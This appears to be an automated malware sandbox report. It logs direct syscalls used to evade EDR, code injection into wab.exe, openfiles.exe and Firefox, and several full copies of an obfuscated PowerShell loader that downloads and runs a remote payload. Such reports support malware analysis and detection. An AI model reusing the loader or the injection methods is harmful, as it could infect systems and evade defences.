Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2028D5D0 mov ecx, dword ptr fs:[00000030h] 12_2_2028D5D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E35D7 mov eax, dword ptr fs:[00000030h] 12_2_202E35D7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E35D7 mov eax, dword ptr fs:[00000030h] 12_2_202E35D7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E35D7 mov eax, dword ptr fs:[00000030h] 12_2_202E35D7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202395DA mov eax, dword ptr fs:[00000030h] 12_2_202395DA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20246620 mov eax, dword ptr fs:[00000030h] 12_2_20246620
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20248620 mov eax, dword ptr fs:[00000030h] 12_2_20248620
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022E627 mov eax, dword ptr fs:[00000030h] 12_2_2022E627
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F626 mov eax, dword ptr fs:[00000030h] 12_2_2020F626

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtProtectVirtualMemory: Direct from: 0x77542F9C Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtSetInformationProcess: Direct from: 0x77542C5C Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtOpenKeyEx: Direct from: 0x77542B9C Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtProtectVirtualMemory: Direct from: 0x77537B2E Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtCreateFile: Direct from: 0x77542FEC Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtOpenFile: Direct from: 0x77542DCC Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtQueryInformationToken: Direct from: 0x77542CAC Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtDeviceIoControlFile: Direct from: 0x77542AEC Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtQueryValueKey: Direct from: 0x77542BEC Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtQueryVolumeInformationFile: Direct from: 0x77542F2C Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtOpenSection: Direct from: 0x77542E0C Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtAllocateVirtualMemory: Direct from: 0x775448EC Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtSetInformationThread: Direct from: 0x775363F9 Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtQuerySystemInformation: Direct from: 0x775448CC Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtClose: Direct from: 0x77542B6C
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtReadVirtualMemory: Direct from: 0x77542E8C Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtCreateKey: Direct from: 0x77542C6C Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtSetInformationThread: Direct from: 0x77542B4C Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtQueryAttributesFile: Direct from: 0x77542E6C Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtOpenKeyEx: Direct from: 0x77543C9C Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtCreateUserProcess: Direct from: 0x7754371C Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtQueryInformationProcess: Direct from: 0x77542C26 Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtResumeThread: Direct from: 0x77542FBC Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtWriteVirtualMemory: Direct from: 0x7754490C Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtDelayExecution: Direct from: 0x77542DDC Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtAllocateVirtualMemory: Direct from: 0x77542BFC Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtReadFile: Direct from: 0x77542ADC Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtQuerySystemInformation: Direct from: 0x77542DFC Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtResumeThread: Direct from: 0x775436AC Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtNotifyChangeKey: Direct from: 0x77543C2C Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtCreateMutant: Direct from: 0x775435CC Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtWriteVirtualMemory: Direct from: 0x77542E3C Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtMapViewOfSection: Direct from: 0x77542D1C Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Section loaded: NULL target: C:\Windows\SysWOW64\openfiles.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: NULL target: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: NULL target: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\openfiles.exe Thread register set: target process: 4944 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\openfiles.exe Thread APC queued: target process: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2A00000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 270F958 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Process created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe" Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$ricki = 1;$gehenna='substrin';$gehenna+='g';function quillaia($overbevokser){$feasibilities=$overbevokser.length-$ricki;for($kompeni=5; $kompeni -lt $feasibilities; $kompeni+=(6)){$fortrnelse+=$overbevokser.$gehenna.invoke($kompeni, $ricki);}$fortrnelse;}function standglas249($babbittess){. ($uti) ($babbittess);}$usheen=quillaia ' s.bcm autoo,roomza,uatipreenludspil emieam.cov/toakt5ethno. org,0kille het,r(egetfw selvinedrunst nidva.ieogunvaw brugsisbje propentidsftagter stdta1scale0ma em.spu.g0rensn;a ver b,dedwurpr,iwoundn sprn6hex n4sub,e; c.to az.mexsvine6k evr4 non.;perso viruera,tndv han,:store1 horo2f ret1 oeme. opti0inten)skerr forkrgsept,eselebc histkle,lio as,r/ inhe2tailz0efter1.ndos0.euro0overb1bund 0,arav1ore,t operfl.udai sprursto,ve,traafslavio,earax .hot/ udsu1 eger2 me.l1krabd.spinu0maedt ';$bogholdersker=quillaia 'forbiuoscilsadr.segangwrbevat- h,ldatheurgpi kyesemidnkrilrt ly p ';$fint=quillaia 'nondihblockt reintetmaapinsers indf:inter/defo /t pvodfryserun acitilb vsysseeexecr.kurs gberr oadfrdo loo.ginconlaf alegabes. .lotc ant o succmgodhj/termoumoun.ctermo?maletefo,grxno.cupinconocensur.ejebtbarra=apraxd pulvocohenwhan.knhol bl i.frocaseaahyr,sdpol r&ar,npitrichdbestr= gar,1unmo oarbejd fugtjlsead9univei po,c8subbabfilat8 egngbrnefdfu,le7adspu4bordvvar.hdu ockac.abenogamel_samme0tiltrm paynaarb.taf.rrerskulkxunmussvildfoan,ipzsmithj korre l,efisu.pknu derbnucul5 burm ';$observandernes=quillaia ' gna >stand ';$uti=quillaia 'dialaim,ddeepr.dexnonex ';$akkumulerede = quillaia 'skaffenar,ocdatamhcathoou,ali fanem%medisaretsgpalligpejersd ,maaaindsttkomb a meta%u,all\ loenfwagneitraktntys,li pillnginesd forssisoagt el viove slfrilslarsh,iretran kursgteksteprokurunifan prece,eklasud,ap1wa,py1b tte9 dext.arikou outpnafkaliideal ne,tb&f,rbi&flamm ozaeefiresc st,chfiguro lede illog$ulovm ';standglas249 (quillaia ' cent$amidog .lukly,ereogarnibretrtan,nirludate:org.nr echrerekinspreapikonjaghe nenma.emehogmorslagte,appanpomeld.senseegn,rsin,ri=ndraa( natucf,jtimkunstd bvre kants/ un,oc fic, yemen$ stv,akravektnneskkombiufidusmlejrsucardiltrykkeminj raccoueskrivd doupearoma)pal,o ');standglas249 (quillaia ' mask$admirg r.shlquarto unrib s.deadansel fork: nummpreachrglazef m.llavalgrbdiphtrgenkeil.viskunsenevugger,rnne=learn$jernbfchallikhevznudsigtskull. hresswolffp un,rl ubndistjertma,ri(tapet$do,laorringb ge,ts.nasseak,usrrvhulvpanoraynglen recldfremfezernerpsychn almueu.loosdispe)ermel ');$fint=$prfabriker[0];standglas249 (quillaia ' akti$actingunderljackpo fidgb optiap mphl pira: baanr mde.ehejreptilsla lejei skelnove,dtuncomecasanrderivseti.l=flskenvo ubenoncuw ho n- methovoldgbef erjthyr,esen ocbin.itextra s.cers egnsy ide,sforkathyrevemot vmchaut. udslnbro zehollytjuv l.gvestw ecome brofbunloocincarl udbyifreere,aglynspdbrtudvik ');standglas249 (quillaia 'psal.$,avshr .krieprotopterroacoyotimovabnbej,st p
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$ricki = 1;$gehenna='substrin';$gehenna+='g';function quillaia($overbevokser){$feasibilities=$overbevokser.length-$ricki;for($kompeni=5; $kompeni -lt $feasibilities; $kompeni+=(6)){$fortrnelse+=$overbevokser.$gehenna.invoke($kompeni, $ricki);}$fortrnelse;}function standglas249($babbittess){. ($uti) ($babbittess);}$usheen=quillaia ' s.bcm autoo,roomza,uatipreenludspil emieam.cov/toakt5ethno. org,0kille het,r(egetfw selvinedrunst nidva.ieogunvaw brugsisbje propentidsftagter stdta1scale0ma em.spu.g0rensn;a ver b,dedwurpr,iwoundn sprn6hex n4sub,e; c.to az.mexsvine6k evr4 non.;perso viruera,tndv han,:store1 horo2f ret1 oeme. opti0inten)skerr forkrgsept,eselebc histkle,lio as,r/ inhe2tailz0efter1.ndos0.euro0overb1bund 0,arav1ore,t operfl.udai sprursto,ve,traafslavio,earax .hot/ udsu1 eger2 me.l1krabd.spinu0maedt ';$bogholdersker=quillaia 'forbiuoscilsadr.segangwrbevat- h,ldatheurgpi kyesemidnkrilrt ly p ';$fint=quillaia 'nondihblockt reintetmaapinsers indf:inter/defo /t pvodfryserun acitilb vsysseeexecr.kurs gberr oadfrdo loo.ginconlaf alegabes. .lotc ant o succmgodhj/termoumoun.ctermo?maletefo,grxno.cupinconocensur.ejebtbarra=apraxd pulvocohenwhan.knhol bl i.frocaseaahyr,sdpol r&ar,npitrichdbestr= gar,1unmo oarbejd fugtjlsead9univei po,c8subbabfilat8 egngbrnefdfu,le7adspu4bordvvar.hdu ockac.abenogamel_samme0tiltrm paynaarb.taf.rrerskulkxunmussvildfoan,ipzsmithj korre l,efisu.pknu derbnucul5 burm ';$observandernes=quillaia ' gna >stand ';$uti=quillaia 'dialaim,ddeepr.dexnonex ';$akkumulerede = quillaia 'skaffenar,ocdatamhcathoou,ali fanem%medisaretsgpalligpejersd ,maaaindsttkomb a meta%u,all\ loenfwagneitraktntys,li pillnginesd forssisoagt el viove slfrilslarsh,iretran kursgteksteprokurunifan prece,eklasud,ap1wa,py1b tte9 dext.arikou outpnafkaliideal ne,tb&f,rbi&flamm ozaeefiresc st,chfiguro lede illog$ulovm ';standglas249 (quillaia ' cent$amidog .lukly,ereogarnibretrtan,nirludate:org.nr echrerekinspreapikonjaghe nenma.emehogmorslagte,appanpomeld.senseegn,rsin,ri=ndraa( natucf,jtimkunstd bvre kants/ un,oc fic, yemen$ stv,akravektnneskkombiufidusmlejrsucardiltrykkeminj raccoueskrivd doupearoma)pal,o ');standglas249 (quillaia ' mask$admirg r.shlquarto unrib s.deadansel fork: nummpreachrglazef m.llavalgrbdiphtrgenkeil.viskunsenevugger,rnne=learn$jernbfchallikhevznudsigtskull. hresswolffp un,rl ubndistjertma,ri(tapet$do,laorringb ge,ts.nasseak,usrrvhulvpanoraynglen recldfremfezernerpsychn almueu.loosdispe)ermel ');$fint=$prfabriker[0];standglas249 (quillaia ' akti$actingunderljackpo fidgb optiap mphl pira: baanr mde.ehejreptilsla lejei skelnove,dtuncomecasanrderivseti.l=flskenvo ubenoncuw ho n- methovoldgbef erjthyr,esen ocbin.itextra s.cers egnsy ide,sforkathyrevemot vmchaut. udslnbro zehollytjuv l.gvestw ecome brofbunloocincarl udbyifreere,aglynspdbrtudvik ');standglas249 (quillaia 'psal.$,avshr .krieprotopterroacoyotimovabnbej,st p
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$ricki = 1;$gehenna='substrin';$gehenna+='g';function quillaia($overbevokser){$feasibilities=$overbevokser.length-$ricki;for($kompeni=5; $kompeni -lt $feasibilities; $kompeni+=(6)){$fortrnelse+=$overbevokser.$gehenna.invoke($kompeni, $ricki);}$fortrnelse;}function standglas249($babbittess){. ($uti) ($babbittess);}$usheen=quillaia ' s.bcm autoo,roomza,uatipreenludspil emieam.cov/toakt5ethno. org,0kille het,r(egetfw selvinedrunst nidva.ieogunvaw brugsisbje propentidsftagter stdta1scale0ma em.spu.g0rensn;a ver b,dedwurpr,iwoundn sprn6hex n4sub,e; c.to az.mexsvine6k evr4 non.;perso viruera,tndv han,:store1 horo2f ret1 oeme. opti0inten)skerr forkrgsept,eselebc histkle,lio as,r/ inhe2tailz0efter1.ndos0.euro0overb1bund 0,arav1ore,t operfl.udai sprursto,ve,traafslavio,earax .hot/ udsu1 eger2 me.l1krabd.spinu0maedt ';$bogholdersker=quillaia 'forbiuoscilsadr.segangwrbevat- h,ldatheurgpi kyesemidnkrilrt ly p ';$fint=quillaia 'nondihblockt reintetmaapinsers indf:inter/defo /t pvodfryserun acitilb vsysseeexecr.kurs gberr oadfrdo loo.ginconlaf alegabes. .lotc ant o succmgodhj/termoumoun.ctermo?maletefo,grxno.cupinconocensur.ejebtbarra=apraxd pulvocohenwhan.knhol bl i.frocaseaahyr,sdpol r&ar,npitrichdbestr= gar,1unmo oarbejd fugtjlsead9univei po,c8subbabfilat8 egngbrnefdfu,le7adspu4bordvvar.hdu ockac.abenogamel_samme0tiltrm paynaarb.taf.rrerskulkxunmussvildfoan,ipzsmithj korre l,efisu.pknu derbnucul5 burm ';$observandernes=quillaia ' gna >stand ';$uti=quillaia 'dialaim,ddeepr.dexnonex ';$akkumulerede = quillaia 'skaffenar,ocdatamhcathoou,ali fanem%medisaretsgpalligpejersd ,maaaindsttkomb a meta%u,all\ loenfwagneitraktntys,li pillnginesd forssisoagt el viove slfrilslarsh,iretran kursgteksteprokurunifan prece,eklasud,ap1wa,py1b tte9 dext.arikou outpnafkaliideal ne,tb&f,rbi&flamm ozaeefiresc st,chfiguro lede illog$ulovm ';standglas249 (quillaia ' cent$amidog 